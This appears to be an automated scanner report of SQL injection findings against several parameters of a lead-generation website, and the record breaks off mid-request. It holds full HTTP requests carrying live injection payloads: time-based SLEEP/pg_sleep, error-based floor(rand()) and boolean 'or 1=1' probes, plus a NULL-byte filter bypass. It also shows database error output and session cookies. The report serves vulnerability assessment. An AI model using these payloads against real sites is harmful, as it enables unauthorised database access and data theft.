GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000'&button3='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=1ofglarcbhtq982a0nk7vjnhn1; JSESSIONID=C0BDC6556DCB75CF40C6BC51D5FC3F91; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:51:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9174
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... R(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000''&button3='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=1ofglarcbhtq982a0nk7vjnhn1; JSESSIONID=C0BDC6556DCB75CF40C6BC51D5FC3F91; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:51:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The attributeId_529 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_529 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000%00'&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=udli5ng4ft1qutifrim44ub5t1; JSESSIONID=3938ED843130D7AF1696C93CADE0B10E; OAID=029085b33b46dc8b68c77befe6006461 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:00:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8350
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ercard&attributeId_529=3407__ $0 - $5,000.'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000%00''&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=udli5ng4ft1qutifrim44ub5t1; JSESSIONID=3938ED843130D7AF1696C93CADE0B10E; OAID=029085b33b46dc8b68c77befe6006461 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:00:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The attributeId_529 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_529 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:23:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... card&attributeId_529=SELECT pg_sleep(25)--'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit'&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:44:47 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit''&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:44:47 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The button3 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the button3 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:23:42 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005'&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:41:38 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005''&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:41:38 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The catId parameter appears to be vulnerable to SQL injection attacks. The payloads 14060216'%20or%201%3d1--%20 and 14060216'%20or%201%3d2--%20 were each submitted in the catId parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:35:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=4fs7cb6rdfn1gntpji2nmnrfe0; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www.insideup.com/ppc/leadflow/"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The companyname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the companyname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:24:28 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' at line 5
The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: 